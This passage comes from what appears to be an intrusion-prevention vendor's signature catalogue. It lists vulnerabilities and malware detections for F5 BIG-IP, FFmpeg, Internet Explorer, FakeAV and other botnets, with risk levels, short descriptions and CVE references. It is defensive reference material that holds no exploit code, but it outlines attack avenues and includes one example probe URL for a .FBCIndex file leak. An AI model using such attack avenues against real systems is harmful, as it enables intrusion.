
There exists a stack-based buffer overflow vulnerability in F5 Big IP firmware. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CSU-F5-Big-IP-ASM-Stack-Based-Buffer-Overflow

References:

CVE-2021-22991
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22991

F5-Big-IP-Dbquery.jsp-SQL-Injection

About this vulnerability:

A vulnerability in F5 Networks BIG-IP

Risk:

High

First detected in:

sgpkg-ips-1678-5242

Last changed:

sgpkg-ips-1678-5242

Platform:

Generic

Software:

F5 Networks BIG-IP

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in F5 BIG-IP. The vulnerability is due to improper validation of user input used in SQL queries within the Configuration Utility component. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database on the target server.

Situation:

HTTP_CRL-F5-Big-IP-Dbquery.jsp-SQL-Injection

References:

CVE-2023-46748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46748

F5-Big-IP-iControl-Authenticated-RCE-Via-Rpm-Creator

About this vulnerability:

A vulnerability in F5 Big-IP's iControl.

Risk:

High

First detected in:

sgpkg-ips-1552-5242

Last changed:

sgpkg-ips-1552-5242

Platform:

Unix; Linux

Software:

F5 Networks BIG-IP

Type:

Input Validation

Description:

A vulnerability in F5 Big-IP's iControl which allows remote attackers to execute arbitrary code by injecting a newline into an RPM .rpmspec file.

Situation:

HTTP_CS-F5-Big-IP-iControl-Authenticated-RCE-Via-Rpm-Creator

References:

CVE-2022-41800
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41800

F5-Big-IP-iControl-CSRF-File-Write-Soap-API

About this vulnerability:

A vulnerability in F5 Big-IP's iControl.

Risk:

High

First detected in:

sgpkg-ips-1552-5242

Last changed:

sgpkg-ips-1552-5242

Platform:

Unix; Linux

Software:

F5 Networks BIG-IP

Type:

Input Validation

Description:

A vulnerability in F5 Big-IP's iControl interface which allows remote attackers to write arbitrary files to the file system by enticing an authenticated administrator to visit a malicious url which redirects them to the target.

Situation:

File-Text_F5-Big-IP-iControl-CSRF-File-Write-Soap-API

References:

CVE-2022-41622
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41622

F5-Big-IP-Next-Central-Manager-Login-SQL-Injection-CVE-2024-26026

About this vulnerability:

A vulnerability in F5 Networks BIG-IP Next Central Manager

Risk:

Critical

First detected in:

sgpkg-ips-1740-5242

Last changed:

sgpkg-ips-1740-5242

Platform:

Generic

Software:

F5 Networks BIG-IP Next Central Manager

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in F5 BIG-IP Next Central Manager. The vulnerability is due to mishandling of user input in the API login functionality. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution.

Situation:

File-Text_F5-Big-IP-Next-Central-Manager-Login-SQL-Injection-CVE-2024-26026

References:

CVE-2024-26026
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-26026

F5-Big-IP-Next-Central-Manager-Validateuserincm-OData-Injection

About this vulnerability:

A vulnerability in F5 Networks BIG-IP Next Central Manager

Risk:

Moderate

First detected in:

sgpkg-ips-1730-5242

Last changed:

sgpkg-ips-1730-5242

Platform:

Generic

Software:

F5 Networks BIG-IP Next Central Manager

Type:

Input Validation

Description:

Mishandling of user input in the validateUserInCM() function causes a data injection vulnerability in F5 Big-IP Central Manager. A successful exploitation can allow an attacker to execute arbitrary SQL on the target system.

Situation:

HTTP_CRL-F5-Big-IP-Next-Central-Manager-Validateuserincm-OData-Injection

References:

CVE-2024-21793
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21793

F5-Big-IP-TMM-Out-Of-Bounds-Write

About this vulnerability:

A vulnerability in F5 Big IP

Risk:

High

First detected in:

sgpkg-ips-1330-5242

Last changed:

sgpkg-ips-1330-5242

Platform:

Generic

Software:

F5 Networks BIG-IP

Type:

Malfunction

Description:

There exists an out-of-bounds vulnerability in Traffic Management Microkernels of F5 Big IP. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_Server-Header-Name-Too-Long

References:

CVE-2021-22992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22992

F5-iControl-Rest-Unauthenticated-RCE-CVE-2021-22986

About this vulnerability:

A vulnerability in F5 BIG-IP

Risk:

High

First detected in:

sgpkg-ips-1331-5242

Last changed:

sgpkg-ips-1332-5242

Platform:

Generic

Software:

F5 Networks BIG-IP

Type:

Malfunction

Description:

There exists a unauthenticated remote code execution vulnerability in iControl REST interface of F5 Networks BIG-IP. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-F5-iControl-Rest-Unauthenticated-RCE-CVE-2021-22986
HTTP_CSH-F5-iControl-Rest-Unauthenticated-RCE-CVE-2021-22986

References:

CVE-2021-22986
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22986

F5-iControl-Rest-Unauthenticated-RCE-CVE-2022-1388

About this vulnerability:

A vulnerability in F5 BIG-IP

Risk:

High

First detected in:

sgpkg-ips-1463-5242

Last changed:

sgpkg-ips-1463-5242

Platform:

Generic

Software:

F5 Networks BIG-IP

Type:

Malfunction

Description:

There exists a unauthenticated remote code execution vulnerability in iControl REST interface of F5 Networks BIG-IP. Successful exploitation could lead in arbitrary code execution.

Situation:

HTTP_CRL-F5-iControl-Rest-Unauthenticated-RCE-CVE-2022-1388

References:

CVE-2022-1388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1388

F5-Multiple-Products-iControl-API-Hostname-Remote-Command-Execution

About this vulnerability:

A vulnerability in F5 Networks BIG-IP

Risk:

High

First detected in:

sgpkg-ips-614-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

F5 Networks BIG-IP; F5 Networks BIG-IP Edge Gateway; F5 Networks BIG-IP Link Controller; F5 Networks BIG-IP WebAccelerator; F5 Networks BIG-IQ Cloud; F5 Networks BIG-IQ Device; F5 Networks BIG-IQ Security; F5 Networks Enterprise Manager

Type:

Input Validation

Description:

A remote command execution vulnerability exists in the iControl API in multiple F5 products. The vulnerability is due to insufficient validation of the hostname element in incoming SOAP requests. A remote, authenticated attacker can exploit this vulnerability by sending malicious SOAP requests to the server. Successful exploitation will result in arbitrary command execution with ROOT privileges.

Situation:

HTTP_CS-F5-Multiple-Products-iControl-API-Hostname-Remote-Command-Execution
HTTPS_CS-F5-Multiple-Products-iControl-API-Hostname-Remote-Command-Execution

References:

CVE-2014-2928
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2928

BID-67278
http://www.securityfocus.com/bid/67278

OSVDB-106728
http://www.osvdb.org/106728

F5-Networks-Big-IP-iControl-Privilege-Escalation

About this vulnerability:

An F5 Networks Big-IP iControl Privilege Escalation vulnerability.

Risk:

High

First detected in:

sgpkg-ips-769-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

F5 Networks BIG-IP

Type:

Insecure Configuration

Description:

A vulnerability in F5 Networks BIG-IP, versions 11.3.0 - 11.6.0, which allows remote attackers to gain privileges via an iCall script or handler in a SOAP request to iControl/iControlPortal.cgi.

Situation:

HTTP_CRL-F5-Networks-Big-IP-iControl-Privilege-Escalation

References:

CVE-2015-3628
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3628

F5-Networks-Big-IP-TMUI-Directory-Traversal-CVE-2020-5902

About this vulnerability:

An attempt to exploit an F5 Networks Big-IP TMUI Directory Traversal vulnerability detected

Risk:

High

First detected in:

sgpkg-ips-1261-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

F5 Networks BIG-IP

Type:

Directory Traversal

Description:

Improper handling of user-supplied path in HTTP requests causes a directory traversal vulnerability in multiple F5 BIG-IP products. A successful exploit allows arbitrary file read, write and remote code execution in ROOT security context.

Situation:

HTTP_CRL-F5-Networks-Big-IP-TMUI-Directory-Traversal-CVE-2020-5902

References:

CVE-2020-5902
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5902

F5-Request-Smuggling-CVE-2023-46747

About this vulnerability:

An attempt to exploit a vulnerability in F5 Networks BIG-IP detected

Risk:

High

First detected in:

sgpkg-ips-1650-5242

Last changed:

sgpkg-ips-1650-5242

Platform:

Generic

Software:

F5 Networks BIG-IP

Type:

Input Validation

Description:

F5 systems with the Traffic Management User Interface (TMUI) exposed are vulnerable to an authentication bypass issue that can lead to a complete compromise. The bypass is related HTTP request smuggling, and it is closely related to CVE-2022-26377.

Situation:

HTTP_CSH-F5-Request-Smuggling-CVE-2023-46747

References:

CVE-2023-46747
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46747

Facebook-Fizz-Early-Data-Integer-Overflow-DoS

About this vulnerability:

A vulnerability in Facebook Fizz

Risk:

High

First detected in:

sgpkg-ips-1150-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Facebook Fizz

Type:

Integer Overflow

Description:

A vulnerability in Facebook Fizz, versions prior to v2019.02.25.00, which allows remote attackers to cause a denial of service condition by sending a crafted request and early data to the target server, due to an integer overflow in the handling of TLS 1.3 early data requests.

Situation:

TLS_CS-Facebook-Fizz-Early-Data-Integer-Overflow-DoS

References:

CVE-2019-3560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3560

Facebook-Photo-Uploader-ActiveX-Control-Buffer-Overflow

About this vulnerability:

A Facebook Photo Uploader ActiveX Control Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-731-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Facebook Photo Uploader

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Facebook Photo Uploader ActiveX control, versions 5.0.14.0 and before, which allows remote attackers to execute arbitrary code via a long FileMask property value.

Situation:

File-Text_Microsoft-Killbit-Disabled-ActiveX-Object

References:

CVE-2008-5711
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5711

BID-27534
http://www.securityfocus.com/bid/27534

OSVDB-41073
http://www.osvdb.org/41073

FakeAV-Botnet

About this vulnerability:	FakeAV botnet
Risk:	High
First detected in:	sgpkg-ips-364-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	FakeAV is a trojan horse program. Hosts compromised by this trojan form a remote controllable botnet.
Situation:	HTTP_CRL-Trojan-FakeAV-File-Download HTTP_CRL-Trojan-FakeAV-Checkin

Fakerean-Botnet

About this vulnerability:	Fakerean botnet
Risk:	High
First detected in:	sgpkg-ips-556-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	FakeRean is a malicious botnet. Infected computers exhibit the presence of a fake antivirus software with varying product names. The monetization scheme of fake antivirus software is to spoof a user interface that resembles the interface of a legitimate antivirus product and to present arbitrary infection indicators. However, in order to disinfect, the user is asked to buy a license. While the affected computer is indeed infected, the intention of the fake antivirus is typically not to disinfect the computer. It is recommended not to buy any kind of license of the fake antivirus program. Instead, users are advised to disinfect computers with antivirus solutions of trusted origin.
Situation:	Generic_SS-Vobfus-Botnet-Request HTTP_CSU-Fakerean-Botnet-Request

Falcon-One-Error-Page-Remote-File-Inclusion

About this vulnerability:

File inclusion vulnerbilities in Falcon One CMS

Risk:

High

First detected in:

sgpkg-ips-202-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Falcon One CMS

Type:

Input Validation

Description:

There is a file inclusion vulnerability in Falcon One CMS. The script does not validate input for various parameters, allowing remote file inclusion and execution of PHP script code in the context of the web server.

Situation:

HTTP_CRL-Falcon-One-Error-Page-Remote-File-Inclusion

References:

CVE-2007-6488
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6488

OSVDB-40986
http://www.osvdb.org/40986

Fallout-Exploit-Kit-Landing-Page

About this vulnerability:	Fallout Exploit Kit landing page was detected
Risk:	High
First detected in:	sgpkg-ips-1102-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	A page was accessed that resembles the Fallout Exploit Kit landing page. Fallout EK is an exploit kit that has been known to target mainly Japanese web sites.
Situation:	File-Text_Fallout-Exploit-Kit-Landing-Page

Famatech-Radmin-Usage

About this vulnerability:	Famatech Radmin usage
Risk:	Low
First detected in:	sgpkg-ips-275-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Famatech Radmin
Type:	Remote Control
Description:	Famatech Radmin is a remote control application. It allows sharing of desktop connections, files, and private networks across machines. Use of this kind of application may be considered a security risk in controlled environments.
Situation:	Generic_CS-Famatech-Radmin-Client-Connection-Attempt

Family-Connections-CMS-Remote-Command-Execution

About this vulnerability:

A Family Connections CMS Remote Command Execution vulnerability.

Risk:

Moderate

First detected in:

sgpkg-ips-710-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

Family Connection CMS

Type:

Buffer Overflow

Description:

A vulnerability in Family Connections CMS, versions 2.5.0 through 2.7.1, which allows remote attackers to execute arbitrary commands via shell metacharacters in the argv[1] parameter.

Situation:

HTTP_CSU_Family-Connections-CMS-Remote-Command-Execution

References:

CVE-2011-5130
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5130

OSVDB-77492
http://www.osvdb.org/77492

Fancy-Product-Designer-Unauthenticated-SQL-Injection

About this vulnerability:

An attempt to exploit a vulnerability in Fancy Product Designer detected

Risk:

High

First detected in:

sgpkg-ips-1829-5242

Last changed:

sgpkg-ips-1829-5242

Platform:

Generic

Software:

WordPress

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Fancy Product Designer detected.

Situation:

HTTP_CRL-Fancy-Product-Designer-Plugin-For-Wordpress-Unauthenticated-SQL-Injection

References:

CVE-2024-51818
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-51818

FANUC-OlpcPRO-Directory-Traversal

About this vulnerability:	FANUC OlpcPRO Directory Traversal Vulnerability 0-day
Risk:	High
First detected in:	sgpkg-ips-627-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	FANUC
Type:	Directory Traversal
Description:	A vulnerability in FANUC OlpcPRO allowing remote attackers to view arbitrary files through directory traversal.
Situation:	HTTP_CSU-FANUC-OlpcPRO-Directory-Traversal

Fastify-Contenttypeparser-Denial-Of-Service

About this vulnerability:

A vulnerability in Fastify

Risk:

Moderate

First detected in:

sgpkg-ips-1518-5242

Last changed:

sgpkg-ips-1518-5242

Platform:

Generic

Software:

Fastify

Type:

Input Validation

Description:

Improper validation of the content-type HTTP header in user requests causes a vulnerability in Fastify. A successful exploit can cause a denial of service condition on the target service.

Situation:

HTTP_CSH-Fastify-Contenttypeparser-Denial-Of-Service

References:

CVE-2022-39288
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-39288

FastTrack-Peer-To-Peer-Network-Usage

About this vulnerability:	FastTrack Peer-to-Peer Network usage
Risk:	Moderate
First detected in:	sgpkg-ips-12-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	FastTrack
Type:	Peer-to-Peer
Description:	FastTrack is a peer-to-peer network that can be used to share files. File sharing can expose to security risks if unintentionally sharing confidential files or downloading files that contain malicious content such as viruses, worms, or backdoors.
Situation:	P2P-TCP_FastTrack-Give P2P-TCP_FastTrack-Get

Fatal-RAT-Infection-Traffic

About this vulnerability:	Fatal RAT infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1380-5242
Last changed:	sgpkg-ips-1380-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Fatal RAT infection traffic was detected.
Situation:	Generic_TCP-Fatal-RAT-Infection-Traffic

Fatek-Automation-PLC-Winproladder-Spf-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Fatek Automation PLC WinProladder

Risk:

Moderate

First detected in:

sgpkg-ips-1304-5242

Last changed:

sgpkg-ips-1304-5242

Platform:

Generic

Software:

Fatek Automation PLC WinProladder

Type:

Buffer Overflow

Description:

Improper validation of data lengths causes a stack buffer overflow in Fatek Automation PLC WinProladder. A successful exploit allows an attacker to execute arbitrary code with the privileges of the affected program.

Situation:

File-Binary_Fatek-Automation-PLC-Winproladder-Spf-Stack-Buffer-Overflow

References:

CVE-2020-16234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16234

Fatek-Automation-PLC-Winproladder-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Fatek Automation PLC WinProladder

Risk:

Moderate

First detected in:

sgpkg-ips-852-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Fatek Automation PLC WinProladder

Type:

Buffer Overflow

Description:

Improper file validation results in a stack buffer overflow vulnerability in Fatek Automation PLC WinProladder. A successful exploitation can allow an attacker to run arbitrary code with the privileges of the daemon, or create a denial of service condition.

Situation:

File-Binary_Fatek-Automation-PLC-Winproladder-Stack-Buffer-Overflow

References:

CVE-2016-8377
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8377

Fatek-Automation-PLC-Winproladder-Tab-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Fatek Automation PLC WinProladder

Risk:

High

First detected in:

sgpkg-ips-1329-5242

Last changed:

sgpkg-ips-1451-5242

Platform:

Generic

Software:

Fatek Automation PLC WinProladder

Type:

Buffer Overflow

Description:

A stack-based buffer overflows exists in Fatek Automation PLC WinProladder. The vulnerability is due to improper validation of user supplied data before copying to a fixed-length stack buffer. A remote attacker could exploit this vulnerability by enticing a target user into opening a crafted .tab file. Successful exploitation could result in arbitrary code execution in the context of the user running the application.

Situation:

File-Binary_Fatek-Automation-PLC-Winproladder-Tab-Stack-Buffer-Overflow

References:

CVE-2020-16234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16234

FBCIndex-Access

About this vulnerability:	FBCIndex
Risk:	Moderate
First detected in:	sgpkg-ips-442-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Mac OS X
Software:	<os>
Type:	Insecure Configuration
Description:	A remote attacker can read the indexed contents of files by submitting a URL to the vulnerable host's Web service in the following format: http://www.example.com/target_directory/.FBCIndex. This information could provide an attacker with sensitive information, including potential passwords useful in dictionary attacks, system configuration settings, installed applications, etc. If this vulnerability is properly exploited, the information gathered by the attacker could be used to further compromise the security of the host.
Situation:	HTTP_CRL-FBCIndex-Access

Felismus-Malware

About this vulnerability:	Felismus Malware
Risk:	High
First detected in:	sgpkg-ips-1020-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Remote Control
Description:	Felismus Malware is a modular and self-updating malware.
Situation:	HTTP_CSH-Felismus-Malware-Request

FFmpeg-4xm-Processing-Memory-Corruption

About this vulnerability:

A vulnerability in FFmpeg Project Team FFmpeg

Risk:

Moderate

First detected in:

sgpkg-ips-421-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FFmpeg Project Team FFmpeg; VideoLAN VLC

Type:

Malfunction

Description:

There is a vulnerability in the FFmpeg audio/video converter. This vulnerability is due to lack of boundary checks on a user supplied value in processing of 4XM movie files. An unauthenticated remote attacker could exploit this vulnerability by enticing a user to play a specially crafted 4XM movie file. Successful exploitation would cause memory corruption which may allow the attacker to execute arbitrary code with the privileges of the currently logged on user. In an attack case where code injection is not successful, the application will terminate unexpectedly. In a more sophisticated attack scenario where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code.

Situation:

File-RIFF_FFmpeg-4xm-Processing-Memory-Corruption

References:

CVE-2009-0385
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0385

BID-33502
http://www.securityfocus.com/bid/33502

OSVDB-51643
http://www.osvdb.org/51643

FFmpeg-CBS_JPEG_Split_Fragment-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in FFmpeg

Risk:

Moderate

First detected in:

sgpkg-ips-1263-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FFmpeg Project Team FFmpeg

Type:

Buffer Overflow

Description:

A missing length check in the function cbs_jpeg_split_fragment() in libavcodec/cbs_jpeg.c causes a vulnerability in FFmpeg. A successful exploit may allow an attacker to execute arbitrary code with the privileges of the target process.

Situation:

File-JPEG_FFmpeg-CBS_JPEG_Split_Fragment-Heap-Buffer-Overflow
File-Binary_FFmpeg-CBS_JPEG_Split_Fragment-Heap-Buffer-Overflow

References:

CVE-2020-12284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12284

FFmpeg-Mov_Read_Keys-Integer-Overflow

About this vulnerability:

A vulnerability in FFmpeg Project Team FFmpeg

Risk:

Moderate

First detected in:

sgpkg-ips-825-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FFmpeg Project Team FFmpeg

Type:

Integer Overflow

Description:

Improper handling of file metadata causes an integer overflow in the mov_read_keys() function in ffmpeg. A successful exploitation allowsa an attacker to run arbitrary code on the target system.

Situation:

File-MPEG_FFmpeg-Mov_Read_Keys-Integer-Overflow

References:

CVE-2016-5199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5199

FFmpeg-OGV-File-Format-Memory-Corruption

About this vulnerability:

A memory corruption vulnerability in FFmpeg

Risk:

Moderate

First detected in:

sgpkg-ips-252-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Any Operating System

Software:

FFmpeg Project Team FFmpeg

Type:

Malfunction

Description:

There is a memory corruption vulnerability in FFmpeg. FFmpeg is used by many projects, including VLC media player, MPlayer, Handbrake, Blender, and Google Chrome. A remote attacker can exploit this vulnerability by enticing a target user to open a malicious ogv file, potentially causing arbitrary code to be injected and executed in the security context of the current user.

Situation:

E-Mail_BS-FFmpeg-OGV-File-Format-Memory-Corruption
HTTP_SS-FFmpeg-OGV-File-Format-Memory-Corruption
File-Binary_FFmpeg-OGV-File-Format-Memory-Corruption

References:

BID-36465
http://www.securityfocus.com/bid/36465

FFmpeg-Vmd_Read_Header-Integer-Overflow

About this vulnerability:

A vulnerability in FFmpeg Project Team FFmpeg

Risk:

Moderate

First detected in:

sgpkg-ips-377-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

FFmpeg Project Team FFmpeg; VideoLAN VLC

Type:

Integer Overflow

Description:

A vulnerability has been reported in FFmpeg that could allow remote attackers to compromise a vulnerable target.

Situation:

HTTP_SS-FFmpeg-Vmd_Read_Header-Integer-Overflow
File-Binary_FFmpeg-Vmd_Read_Header-Integer-Overflow

References:

BID-36419
http://www.securityfocus.com/bid/36419

Ficker-Stealer-Infection-Traffic

About this vulnerability:	Ficker stealer infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1352-5242
Last changed:	sgpkg-ips-1352-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Ficker stealer infection traffic was detected.
Situation:	Generic_TCP-Ficker-Stealer-Infection-Traffic

File-Binary_Adobe-Acrobat-EMF-EMR_alphablend-CVE-2018-12789-Out-Of-Bounds-Read

About this vulnerability:

A vulnerability in Adobe Systems Acrobat 2017

Risk:

Moderate

First detected in:

sgpkg-ips-1093-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Adobe Acrobat

Type:

Malfunction

Description:

Improper parsing of an EMR_ALPHABLEND record in an EMF file causes an out of bounds read vulnerability in Adobe Acrobat. A successful exploit may allow an attacker to access sensitive information.

Situation:

File-Binary_Adobe-Acrobat-EMF-EMR_alphablend-CVE-2018-12789-Out-Of-Bounds-Read

References:

CVE-2018-12789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12789

File-Flash_Adobe-Flash-copyPixels-Integer-Overflow

About this vulnerability:

A vulnerability in Adobe Flash Player

Risk:

High

First detected in:

sgpkg-ips-1329-5242

Last changed:

sgpkg-ips-1329-5242

Platform:

Generic

Software:

Adobe Flash Player; Adobe Systems AIR

Type:

Integer Overflow

Description:

There exists an integer overflow vulnerability in Adobe Flash. A remote attacker can exploit this vulnerability by enticing a target user to open a crafted file. Successful exploitation could result in the execution of arbitrary code in the security context of the target user.

Situation:

File-Flash_Adobe-Flash-copyPixels-Integer-Overflow

References:

CVE-2016-1010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1010

File-Flash_SecureSWF-Obfuscation

About this vulnerability:	A suspicious Flash file detected
Risk:	Moderate
First detected in:	sgpkg-ips-1051-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	A suspicious Flash file has been detected that uses the commercial SecureSWF obfuscator from http://www.kindi.com. This obfuscator is used by exploit kits to obfuscate Flash exploits.
Situation:	File-Flash_SecureSWF-Obfuscation

File-Replication-Pro-execCommand-Command-Execution

About this vulnerability:	A vulnerability in File Replication Pro
Risk:	High
First detected in:	sgpkg-ips-741-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	File Replication Pro
Type:	Input Validation
Description:	There exists a command execution vulnerability in File Replication Pro.
Situation:	Generic_CS-File-Replication-Pro-execCommand-Command-Execution

File-Sharing-Wizard-POST-SEH-Buffer-Overflow

About this vulnerability:

A vulnerability in File Sharing Wizard

Risk:

High

First detected in:

sgpkg-ips-1199-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

File Sharing Wizard

Type:

Buffer Overflow

Description:

A vulnerability in File Sharing Wizard 1.5.0 which allows remote attackers to execute arbitrary code through an SEH based buffer overflow in an HTTP POST parameter.

Situation:

HTTP_CS-File-Sharing-Wizard-POST-SEH-Buffer-Overflow

References:

CVE-2019-16724
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16724

File-Text_Document-Template-Injection

About this vulnerability:	A possibly malicious Word document file with references to external template detected
Risk:	Moderate
First detected in:	sgpkg-ips-1038-5242
Last changed:	sgpkg-ips-1474-5242
Platform:	Windows
Software:	Microsoft Word
Type:	Insecure Configuration
Description:	Microsoft Office Word has a feature, which allows downloading templates from external sources. These templates can be used to execute malicious activities. Also in addition, user's credentials can be harvested when an external template is requested.
Situation:	File-Text_Document-Template-Injection File-TextId_Document-Template-Injection

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3873

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-544-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 10.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3873
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3873-2

References:

CVE-2013-3873
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3873

MS13-080
http://technet.microsoft.com/security/bulletin/MS13-080

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3874

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-544-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3874

References:

CVE-2013-3874
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3874

MS13-080
http://technet.microsoft.com/security/bulletin/MS13-080

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3875

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-544-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 8.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3875

References:

CVE-2013-3875
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3875

MS13-080
http://technet.microsoft.com/security/bulletin/MS13-080

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3885

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-544-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 10.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3885

References:

CVE-2013-3885
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3885

MS13-080
http://technet.microsoft.com/security/bulletin/MS13-080

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3893

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-543-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Internet Explorer.

Situation:

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3893
File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3893-2

References:

CVE-2013-3893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3893

File-Text_Microsoft-Internet-Explorer-Memory-Corruption-CVE-2013-3914

About this vulnerability:

A vulnerability in Microsoft Internet Explorer

Risk:

High

First detected in:

sgpkg-ips-550-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0

Type:

